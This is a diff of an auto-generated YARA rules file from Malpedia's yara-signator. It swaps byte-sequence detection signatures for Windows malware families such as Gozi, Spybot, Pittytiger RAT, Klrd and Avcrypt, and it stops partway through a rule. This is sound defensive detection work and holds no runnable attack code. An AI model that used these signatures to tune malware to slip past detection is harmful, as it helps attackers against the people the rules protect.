-		logic_hash = "71981dc7d5e3732f6bffc2a9248cb281eeec7fbd198e397f9ba4db0beb4f7d0b"
+		logic_hash = "1c69545b2fc9583e56f8f6f93522f6191f76f6718f05e9ec7b5fbf60b049d689"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -147281,32 +147135,32 @@ rule MALPEDIA_Win_Synflooder_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 762a 56 e8???????? 8d0445f4f34000 8bc8 }
-		$sequence_1 = { 8be5 5d c3 8b35???????? b802000000 6a50 668944242c }
-		$sequence_2 = { 8bec 8b4508 ff34c580e44000 ff15???????? 5d }
-		$sequence_3 = { 0f8f0b010000 33f6 85db 7e1b 8bff e8???????? 0fbec0 }
-		$sequence_4 = { 8a13 0fb6ca 0fbe8910ee4000 85c9 }
-		$sequence_5 = { 897e70 c686c800000043 c6864b01000043 c74668f0e54000 }
-		$sequence_6 = { 03048d20fc4000 eb02 8bc2 f6402480 }
-		$sequence_7 = { 33c5 8945fc 8d8568faffff 50 6a02 ff15???????? }
-		$sequence_8 = { c7470640008006 8b44242c 50 ff15???????? }
-		$sequence_9 = { 897df4 85ff 75d1 53 e8???????? 8b45f0 }
+		$sequence_0 = { 0f8412fdffff ff442410 ff4c2418 837c241800 7fdb e9???????? 56 }
+		$sequence_1 = { eb0a 8b7508 e8???????? 8bc6 8b4df4 5f 5e }
+		$sequence_2 = { 7708 c6063f 46 c6063d 46 8bc6 2b45e0 }
+		$sequence_3 = { c645fc00 e8???????? 8b4df4 8b4508 64890d00000000 5e c9 }
+		$sequence_4 = { e9???????? 33db 895c2414 8d442414 50 6a01 }
+		$sequence_5 = { 8bf0 8d442418 8bcb e8???????? 8b08 8b4004 }
+		$sequence_6 = { e8???????? 53 56 8d4dd8 eb29 }
+		$sequence_7 = { 8365fc00 6bc01c 03818c000000 56 8b7508 50 }
+		$sequence_8 = { 8b4d08 83c410 8d5104 8bc1 3bca 7412 }
+		$sequence_9 = { 50 e8???????? 8bf0 59 8d8528ffffff 50 e8???????? }
 
 	condition:
-		7 of them and filesize < 163840
+		7 of them and filesize < 2912256
 }
-rule MALPEDIA_Win_Venomloader_Auto : FILE
+rule MALPEDIA_Win_Pittytiger_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "360daa47-065f-559b-a4bd-3c105892d050"
+		id = "4a10640a-725b-54f9-8b7f-afdce80ef3e7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.venomloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.venomloader_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pittytiger_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pittytiger_rat_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "2a010e987b08fda7866a0ce45dd38105218c7c231dfd9f1e74d7bf8cc14fb654"
+		logic_hash = "1df7687d7c472496ea30aa086a3178f66e3b2104d4ea79dc045c4e3023b998ae"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -147320,34 +147174,34 @@ rule MALPEDIA_Win_Venomloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48894d10 895518 4c894520 837d1803 7758 837d1802 }
-		$sequence_1 = { 488d1503ad0a00 c70105000000 48895108 c3 488d15f1ac0a00 c7010b000000 48895108 }
-		$sequence_2 = { 53 4883ec20 4889cb 488d0d91b90000 e8???????? 4889c2 488b03 }
-		$sequence_3 = { 4883e918 4c89e2 e8???????? eb88 488d0d07f10400 e8???????? 4889c3 }
-		$sequence_4 = { 4889742468 0f11742450 e8???????? 488b442470 488b542478 488b9c2488000000 4889542478 }
-		$sequence_5 = { 48c1ea20 83e201 4c39d9 72df 4983eb01 4d29eb 4983e3fc }
-		$sequence_6 = { 84d2 0f84b8000000 384549 7452 384548 744d 38c1 }
-		$sequence_7 = { 4989d0 488d1540910c00 4889c1 e8???????? 488d85d0040000 488d95f0040000 4c8d05d3910c00 }
-		$sequence_8 = { 4c89e2 4889e9 66897c2468 e8???????? 89c7 84c0 0f85fd050000 }
-		$sequence_9 = { 48895e18 8b08 85c9 0f853e010000 83430801 488d05e02d0b00 48897e20 }
+		$sequence_0 = { 50 ffd7 83c410 8d8558f9ffff 50 ff15???????? 50 }
+		$sequence_1 = { 33db f3ab ff7508 895dfc 66ab aa }
+		$sequence_2 = { e8???????? 83c428 8d85e0fdffff 50 8b46f8 ff760c c1e005 }
+		$sequence_3 = { 8d85f8fbffff ffb69c010000 68???????? 50 ffd7 }
+		$sequence_4 = { 8b1d???????? 59 59 56 ffd3 57 }
+		$sequence_5 = { 3bc3 a3???????? 0f84f2fdffff 8d45b8 c745c441786100 50 57 }
+		$sequence_6 = { 56 56 ff15???????? 3bc6 8945f4 0f84bc000000 }
+		$sequence_7 = { 51 53 56 57 33db bf80000000 53 }
+		$sequence_8 = { e8???????? 85c0 0f85e2020000 85f6 }
+		$sequence_9 = { ff750c ff7508 e8???????? 83c420 43 }
 
 	condition:
-		7 of them and filesize < 2592768
+		7 of them and filesize < 2162688
 }
-rule MALPEDIA_Win_Gozi_Auto : FILE
+rule MALPEDIA_Win_Spica_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9c925d7e-4a58-58b3-a521-9431dccc113c"
+		id = "fb7e9642-1902-5334-b719-e15942756229"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gozi_auto.yar#L1-L308"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spica"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spica_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "d60d7415702d07d989a84ad089c91c9c930dfc0751149612c046eb9a7bf0b686"
+		logic_hash = "ed495be78d555972a0dc5475fda2591b6a4e5ced1e014a8ddb16a1315155952a"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -147359,54 +147213,32 @@ rule MALPEDIA_Win_Gozi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4dd0 03d1 8915???????? 03d9 891d???????? a3???????? }
-		$sequence_1 = { 6a00 68cee6ac00 52 50 e8???????? 898500ffffff }
-		$sequence_2 = { 50 ff7508 8d8771030000 ff10 }
-		$sequence_3 = { fb 5c 3c32 7e02 19c1 a6 3327 }
-		$sequence_4 = { c9 50 0c73 0e 96 3b5375 60 }
-		$sequence_5 = { 55 f79bfe7ca80d a7 ad b710 }
-		$sequence_6 = { 6a00 e8???????? 85c0 0f8899000000 8b45a8 }
-		$sequence_7 = { 8ee1 54 257c693a5c 48 fb 5c }
-		$sequence_8 = { e8???????? 03f0 46 ebdc ff75fc e8???????? }
-		$sequence_9 = { 6a00 6a00 6a00 8d87a2020000 ff10 }
-		$sequence_10 = { 0f8459010000 50 ff7570 ff15???????? }
-		$sequence_11 = { 50 8b35???????? ffd6 57 68???????? e8???????? }
-		$sequence_12 = { 50 68???????? 6a00 e8???????? c745ec01000000 }
-		$sequence_13 = { 8b4d18 e8???????? 8b45e0 50 }
-		$sequence_14 = { 3327 72e7 3ebb4a68d947 d93e }
-		$sequence_15 = { 3818 0f8453feffff 50 e8???????? 89463c ffb574ffffff }
-		$sequence_16 = { e8???????? ebda 8bc3 c1f805 8d3c85e00c4400 }
-		$sequence_17 = { 89950cfeffff 8b8d08feffff 0b8d0cfeffff 7431 0fc0f2 }
-		$sequence_18 = { f6c5ae 69d5e21d6c7f 0fc0f2 0fce 8af4 }
-		$sequence_19 = { ffb5acfeffff e8???????? 8bd8 039dacfeffff ff7510 53 }
-		$sequence_20 = { dc6f1b 95 bf633629a8 02738f 1da2c9dde2 }
-		$sequence_21 = { 84e5 0fce 0fbef4 69f116814003 0faceaca c0d6f6 }
-		$sequence_22 = { 8b440704 8945a4 50 e8???????? 8b4648 8b7c0708 897da0 }
-		$sequence_23 = { 68???????? ffb5bcfdffff ff15???????? 897dfc e8???????? 8d85c0fdffff 50 }
-		$sequence_24 = { 03c7 03cf 83ff1f 0f87a4030000 ff24bd95244300 }
-		$sequence_25 = { e8???????? 83f8ff 7442 8985fcfeffff 68???????? e8???????? }
-		$sequence_26 = { 8ad0 4a 8ad0 84c1 }
-		$sequence_27 = { 6af4 dbe9 68912b4384 2383e08985e4 0572b6e2f4 fd }
-		$sequence_28 = { 128b42926614 12a502b346d1 41 b87e8da638 e022 }
-		$sequence_29 = { 68???????? ff75c0 ff15???????? 834dfcff e8???????? ff7508 8d45c4 }
-		$sequence_30 = { 0f848ffbffff 50 8b4658 8d443804 50 e8???????? 898574ffffff }
-		$sequence_31 = { 5b 5f c9 c21400 8d87eb040000 8b00 }
+		$sequence_0 = { f3410f6f9798080000 f3410f6f9fa8080000 660f7f9b20040000 660f7f9310040000 660f7f8b00040000 660f7f83f0030000 41c687a409000001 }
+		$sequence_1 = { f30f7f01 e9???????? 4883fe08 488b4c2470 480f42ce 488b5c2430 4829d9 }
+		$sequence_2 = { ff15???????? 4885c0 0f84d9050000 4889c1 488905???????? 41b880000000 31d2 }
+		$sequence_3 = { eb1b 4d8b8590000000 b800020000 4c234658 b940020000 0f44c1 4533db }
+		$sequence_4 = { e8???????? 488d95b0000000 4889d9 e8???????? 440fb7f8 0fb74b58 4189cc }
+		$sequence_5 = { ff5018 4d89fd 84c0 7424 e9???????? 0f854f060000 4c89f1 }
+		$sequence_6 = { ff15???????? 488b0b 488b93a0000000 4885d2 741b 0fb783c0000000 3bf0 }
+		$sequence_7 = { 8b442458 4863cb 448bf3 4903cf 4863e8 48c1e520 ffc3 }
+		$sequence_8 = { ffc7 4983c670 3b7d00 7cab 4c8b742448 488b5c2440 488b6c2450 }
+		$sequence_9 = { ffc1 f7f1 418bc1 8bcd 442bc2 33d2 41f737 }
 
 	condition:
-		7 of them and filesize < 568320
+		7 of them and filesize < 14034944
 }
-rule MALPEDIA_Win_Wpbrutebot_Auto : FILE
+rule MALPEDIA_Win_Cova_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "79a22dd8-32fa-5f98-87d6-8da78951869d"
+		id = "d9a7c58b-e153-5509-9dd6-42fb3c64fb6e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wpbrutebot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wpbrutebot_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cova"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cova_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "5822d74137e23703d26984f7196edc8d3decd3d594175136f45cb9821ea5add2"
+		logic_hash = "6df5413ed9281b7c21331e877b1103faf7f6d9e2e13d53e94329d8c943fa063c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -147420,32 +147252,32 @@ rule MALPEDIA_Win_Wpbrutebot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c745f85968337b 33c0 c645fc00 8d4809 304c05f8 40 83f804 }
-		$sequence_1 = { 85c0 0f8438020000 ff7624 8b442418 ff742414 50 50 }
-		$sequence_2 = { f7e9 c1fa02 8bc2 c1e81f 03c2 83f803 764f }
-		$sequence_3 = { c1c010 85c3 7416 8b449438 8904ef b810000000 668944ef04 }
-		$sequence_4 = { ff742458 0f45c8 8d44247c ff742434 55 56 52 }
-		$sequence_5 = { c3 b8???????? eb0c b8???????? eb05 b8???????? 57 }
-		$sequence_6 = { c74008???????? c7400ca0f76200 c74010e1000000 c3 e8???????? 85c0 0f8488000000 }
-		$sequence_7 = { eb10 83f804 755e 807c244020 0f85130d0000 8b442418 8d0480 }
-		$sequence_8 = { c605????????00 e8???????? b9???????? c645fc05 e8???????? 6a6b 68???????? }
-		$sequence_9 = { 803f2f 0f8518020000 807f012f 7563 8a4702 83c702 3c2f }
+		$sequence_0 = { 813bc8000000 7577 488d4d88 ff9598000000 488d4d80 8bf0 b81f85eb51 }
+		$sequence_1 = { 4c8d8d70120000 4c8d8560010000 4889542430 488d95e0000000 }
+		$sequence_2 = { 488d442440 4889442428 488d0518a30000 4889442420 4c8b4c2450 4c8b442458 }
+		$sequence_3 = { 488d8d00150000 ff55b0 448d4e08 4c8d442470 8d1400 488d8d00150000 ff5550 }
+		$sequence_4 = { 41b806000000 488d158e680000 483950f0 740c 488b10 4885d2 }
+		$sequence_5 = { 33d2 33c9 ff5778 488bd8 4885c0 741f ba20bf0200 }
+		$sequence_6 = { 57 4883ec20 488d1ddf5e0000 bf0a000000 }
+		$sequence_7 = { 7d08 8d4a30 418808 eb06 }
+		$sequence_8 = { 4885c9 741c f0ff09 7517 488d05bf830000 }
+		$sequence_9 = { ba20bf0200 488bc8 ff5720 3d80000000 742a }
 
 	condition:
-		7 of them and filesize < 5134336
+		7 of them and filesize < 123904
 }
-rule MALPEDIA_Win_Get2_Auto : FILE
+rule MALPEDIA_Win_Unidentified_108_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7a0226d0-f79d-5836-a967-6167cb32e47b"
+		id = "523cac0e-068e-567f-9b67-256b819ee9a9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.get2"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.get2_auto.yar#L1-L165"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_108"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_108_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "848d65ded147178f011a1ef08b3d4ca3bdaaa4bd6535c16bb052e44171fc3a23"
+		logic_hash = "ff49cd548bd3e2342145a6556aab556577d4c1ad014ed5644df8b6ae901a1a52"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -147459,38 +147291,32 @@ rule MALPEDIA_Win_Get2_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8b4508 8be5 5d c20400 68d0000000 b8???????? }
-		$sequence_1 = { 0f849e000000 807d0c00 0f859a000000 f6c104 }
-		$sequence_2 = { 8bf1 8975d0 33ff 8975cc }
-		$sequence_3 = { 8b4508 660f6ec1 f30fe6c0 c1e91f 51 51 660f6ec8 }
-		$sequence_4 = { 8d55d8 8d8d24ffffff e8???????? 59 8bc8 }
-		$sequence_5 = { 83e017 89410c 8b4910 23c8 0f849e000000 807d0c00 }
-		$sequence_6 = { 895dfc e8???????? c645fc02 eb0b 8d45d8 }
-		$sequence_7 = { 897e04 897e08 33db c745ec07000000 }
-		$sequence_8 = { 488d7b38 488d05a6020200 483947f0 741a 488b0f 4885c9 }
-		$sequence_9 = { 4863c8 488b4308 48894cd008 483b6b10 0f83ba010000 }
-		$sequence_10 = { 488d8c24f0020000 e8???????? 90 418bd5 488d8c2470040000 }
-		$sequence_11 = { 488d4c2450 e8???????? 498bcc e8???????? 4c8b642468 }
-		$sequence_12 = { eb0f 49394e10 720b bb02000000 895c2420 }
-		$sequence_13 = { 440f45e8 410fb6dd 4c8b7df0 498bcf ff15???????? eb0d }
-		$sequence_14 = { 488d0503b20200 488bd9 488901 f6c201 740a }
-		$sequence_15 = { 4c8d0510e00100 488d15c9a40100 e8???????? 488bd8 }
+		$sequence_0 = { 4c8d05a21d0100 488bf9 488d15a01d0100 b904000000 e8???????? 8bd3 }
+		$sequence_1 = { 48c1fe06 4c8d2d0a5b0100 83e03f 4c8d24c0 498b44f500 }
+		$sequence_2 = { 488d15e7f30000 83e03f 4d8bfd 49c1ff06 41b90a000000 488d3cc0 }
+		$sequence_3 = { 742e 488d5510 0f1f840000000000 803201 }
+		$sequence_4 = { 8b0d???????? 458bc5 f20f1005???????? 488bf8 }
+		$sequence_5 = { 488d5201 41ffc0 488d4520 498bcc }
+		$sequence_6 = { 4c8d15e0f40000 83e03f 498bd5 48c1fa06 }
+		$sequence_7 = { 736e 488bc3 488bf3 48c1fe06 4c8d2d4ef70000 83e03f }
+		$sequence_8 = { 486bc000 488d0d5ed50100 8b542430 48891401 488d0dd7250100 e8???????? }
+		$sequence_9 = { 48894dff 83e03f 458be9 488d0dd066ffff 4c8945e7 }
 
 	condition:
-		7 of them and filesize < 720896
+		7 of them and filesize < 307200
 }
-rule MALPEDIA_Win_Telb_Auto : FILE
+rule MALPEDIA_Win_Klrd_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "888a5e5b-e658-58db-97cc-bf969236e2af"
+		id = "f2ac53cd-82a8-55ea-badd-f6f1aae58f93"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.telb"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.telb_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.klrd_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "e3ec407f2b3918e01e6c60147a108fc9762a60e1c29d49f9899f4240d976bb07"
+		logic_hash = "0fc6f030ea4bb49d87359f96c6eceeeaeffbdd94bdee42030f76f2d7ec66a19a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -147504,32 +147330,32 @@ rule MALPEDIA_Win_Telb_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? a1???????? 33c4 89842404100000 56 57 6a00 }
-		$sequence_1 = { 51 e8???????? 83c408 8d85e8dfffff c78598dfffff00000000 8985a0dfffff }
-		$sequence_2 = { eb07 6a16 68???????? e8???????? 8d4c2430 e8???????? }
-		$sequence_3 = { 81cf00000003 89bd48eeffff 0f1000 0f1185b0eeffff f30f7e4010 }
-		$sequence_4 = { ffd1 8bf0 8b442414 50 8b08 ff5108 }
-		$sequence_5 = { 8d8d88efffff e8???????? 33c9 81cf80000000 89bd38eeffff }
-		$sequence_6 = { c7400400000000 8985e8edffff 8908 c645fc09 8b85a8eeffff 89853ceeffff 8b85dceeffff }
-		$sequence_7 = { c644241b01 8b14b8 8bca 8d7102 668b01 }
-		$sequence_8 = { eb06 8bbd48eeffff 80bd4feeffff00 0f84a1010000 51 8d8d88efffff e8???????? }
-		$sequence_9 = { c7401407000000 668908 8d8db8efffff c645fc28 }
+		$sequence_0 = { 8d85fcefffff 50 e8???????? 59 50 }
+		$sequence_1 = { 8d85fcefffff 50 57 ff15???????? 57 ff15???????? }
+		$sequence_2 = { e8???????? 59 50 8d85fcefffff 50 57 }
+		$sequence_3 = { 3c00 0f8485020000 3c03 0f847d020000 3c09 0f8475020000 3c08 }
+		$sequence_4 = { c685c0fdffff00 68ff000000 6a00 8d85c1fdffff 50 e8???????? 83c40c }
+		$sequence_5 = { 59 59 ff7510 ff750c ff7508 ff35???????? ff15???????? }
+		$sequence_6 = { ebcc 8a85e7feffff 8885acfcffff 80bdacfcffff08 742f }
+		$sequence_7 = { 56 56 6a04 56 56 68000000c0 68???????? }
+		$sequence_8 = { 59 8d7dec f3a5 8b45ec 25ff000000 8885e7feffff 3c00 }
+		$sequence_9 = { ffb5b0fcffff ff15???????? 8985c8feffff 83bdc8feffff00 7515 ff15???????? }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Poohmilk_Auto : FILE
+rule MALPEDIA_Win_Collectorgoomba_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cacedc8f-4cf2-5e4c-8224-5986e70d4e19"
+		id = "030c7bf4-8b0d-51f1-a0c7-6787c27c5097"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.poohmilk_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.collectorgoomba"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.collectorgoomba_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "15b630d72bc25e1b2f8f69f3f9fe553b37147103f16fa6bc4f49ddd60f0d2e34"
+		logic_hash = "da75c37e8b44a581ccdac242b61ed90697e0dec4be3fbb969cde47a5043e7eae"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -147543,32 +147369,32 @@ rule MALPEDIA_Win_Poohmilk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c3 68???????? 8d95ecfdffff 52 }
-		$sequence_1 = { 0f84de000000 3bf3 0f84d6000000 8b4110 0fb75704 }
-		$sequence_2 = { 752c ff15???????? 6a05 6a00 6a00 }
-		$sequence_3 = { 0f84d3000000 33d2 668910 8d85d4f9ffff }
-		$sequence_4 = { 8b01 33ff 8995f4efffff 397e10 0f86cf000000 }
-		$sequence_5 = { 83ffff 0f8456ffffff 8b95d4fbffff 6a00 8d8dd0fbffff 51 }
-		$sequence_6 = { 8bd1 03d7 c785ecefffff00000000 1385ecefffff 89bde8efffff }
-		$sequence_7 = { 8b8570d2ffff 8b5038 837a3400 7513 8b8d84d2ffff 8b5028 }
-		$sequence_8 = { 40 80b9b075410000 74e8 8a13 0fb6ca 0fbe89b0754100 }
-		$sequence_9 = { 33c0 894610 894614 894618 89461c 8b4620 8b4f28 }
+		$sequence_0 = { ff30 ff7508 e8???????? 59 59 898504ffffff 6af7 }
+		$sequence_1 = { 8b45f4 c1e803 8b4d08 8b4954 0fb60401 8b4df4 83e107 }
+		$sequence_2 = { ff75fc e8???????? 83c410 ff75c8 ff7588 6a7a ff75fc }
+		$sequence_3 = { ff702c ff7508 e8???????? 83c40c ff75f4 6a24 ff75fc }
+		$sequence_4 = { ff750c ff75e8 ff75e4 e8???????? 83c414 8b4df4 64890d00000000 }
+		$sequence_5 = { ff15???????? 59 8b4514 83e002 7421 ff7518 8b4514 }
+		$sequence_6 = { ffb594feffff ffb590feffff e8???????? 83c40c c645fc23 8d8d54fcffff e8???????? }
+		$sequence_7 = { ff75f8 e8???????? 83c418 33c0 40 e9???????? 8b450c }
+		$sequence_8 = { ffb558ffffff ffb554ffffff 8b4508 ff30 e8???????? 83c418 8945d0 }
+		$sequence_9 = { ffb518ffffff 8d8500fdffff 50 e8???????? 83c40c 898514ffffff 8b8514ffffff }
 
 	condition:
-		7 of them and filesize < 245760
+		7 of them and filesize < 1400832
 }
-rule MALPEDIA_Win_Alphanc_Auto : FILE
+rule MALPEDIA_Win_Avcrypt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "44e5cd2d-dd6f-5dec-8633-e36984c0d4b0"
+		id = "6717dbdb-f4ba-5c23-a152-195fba62bfc4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.alphanc_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.avcrypt_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "d03fa53d22f05f45f0bb38627a16b1b71ce74e44da84ac0b88c2ab879180e110"
+		logic_hash = "88e8fd00aad138bd5391f93ff200b42a3193bfb4856f2e79b29034d74d91998c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -147582,32 +147408,32 @@ rule MALPEDIA_Win_Alphanc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 8d45f0 8d4de8 50 51 ff15???????? 57 }
-		$sequence_1 = { 8d044544ce4e00 eb59 8d044542ce4e00 eb50 f6c303 740d 0fb74208 }
-		$sequence_2 = { 8b6c2424 55 56 e8???????? 8b542458 83c408 8d4aff }
-		$sequence_3 = { bf50000000 6a41 e9???????? 56 e8???????? 83c404 85c0 }
-		$sequence_4 = { e8???????? 85c0 7526 8a4b7c 8a142e 32d1 6857a0a6f8 }
-		$sequence_5 = { 8b6c2438 68f1000000 68???????? 6a68 6891000000 6a04 e8???????? }
-		$sequence_6 = { 8b7c240c 8b4604 894704 8b0e 8b5608 51 52 }
-		$sequence_7 = { e8???????? 8be8 83c40c 85ed 753e b841000000 6852010000 }
-		$sequence_8 = { 8b4d04 83c102 3bc1 7cef 8b5504 83c202 895704 }
-		$sequence_9 = { 57 e8???????? 83c408 85c0 0f8489000000 8b0f 8b5500 }
+		$sequence_0 = { e8???????? 83c40c 8d4dc0 e8???????? be???????? c745fc02000000 56 }
+		$sequence_1 = { 0fb7c8 b8ffff0000 663bc1 8b4dec 6a04 58 }
+		$sequence_2 = { ddd8 db2d???????? b801000000 833d????????00 0f8516a20000 ba05000000 8d0d60974300 }
+		$sequence_3 = { 8b00 837dec08 8d4dd8 8bd0 0f434dd8 }
+		$sequence_4 = { e8???????? 59 8365fc00 8b049d80b54300 f644380401 7413 ff7510 }
+		$sequence_5 = { 8ac3 e8???????? c3 68a4020000 b8???????? e8???????? 8bc2 }
+		$sequence_6 = { 68???????? 6a18 6a18 50 e8???????? e8???????? }
+		$sequence_7 = { b44b 5a baa5c94fad 90 302c83 2d2171e50b }
+		$sequence_8 = { 48 7412 e8???????? c70016000000 e8???????? ebb4 c745e440be4300 }
+		$sequence_9 = { 8965c8 68???????? e8???????? 83ec18 c645fc14 8bcc 68???????? }
 
 	condition:
-		7 of them and filesize < 2015232
+		7 of them and filesize < 6160384
 }
-rule MALPEDIA_Win_Spybot_Auto : FILE
+rule MALPEDIA_Win_Banatrix_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f487b739-5a23-52d3-8b27-57437fc4fe82"
+		id = "6974f81a-af90-539d-af3d-94a99f9a6ee8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spybot_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.banatrix"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.banatrix_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "086db381edc017239cf316ebb3a9419f50149c95f9ac3a29e8ecb7d10b4a280d"
+		logic_hash = "c6cf826d5b4f12a87f113cad069f8b787ae4fd983cd321b74f5d11035bda50a6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -147621,34 +147447,34 @@ rule MALPEDIA_Win_Spybot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8975f8 8975f0 68???????? ff750c ff7508 e8???????? 83c418 }
-		$sequence_1 = { 6a03 8b5c2414 99 59 33ff f7f9 8bf2 }
-		$sequence_2 = { 59 e9???????? 57 68???????? e8???????? 59 85c0 }
-		$sequence_3 = { 33f6 ff7508 56 ff15???????? 85c0 7429 }
-		$sequence_4 = { 33f6 ffb56cffffff 57 e8???????? 59 85c0 59 }
-		$sequence_5 = { 8945f0 8945f4 8945f8 8945fc a1???????? 85c0 7411 }
-		$sequence_6 = { 8bb43570ffffff 3bf3 897508 0f8469a4ffff 399d54ffffff 0f855da4ffff 68???????? }
-		$sequence_7 = { ff7020 8d85fcfdffff 68???????? 50 e8???????? 6a01 }
-		$sequence_8 = { ff7514 8975fc e8???????? 56 8945ec ff7510 897514 }
-		$sequence_9 = { e9???????? ffb570ffffff 68???????? e8???????? 59 85c0 59 }
+		$sequence_0 = { e9???????? 8b470c 85c0 74e3 }
+		$sequence_1 = { 8b45cc d16dd0 8b4dd0 8d34c8 8b0e 81e1ffffff7f 034dc8 }
+		$sequence_2 = { 0f44d0 e9???????? 7418 8b75d4 }
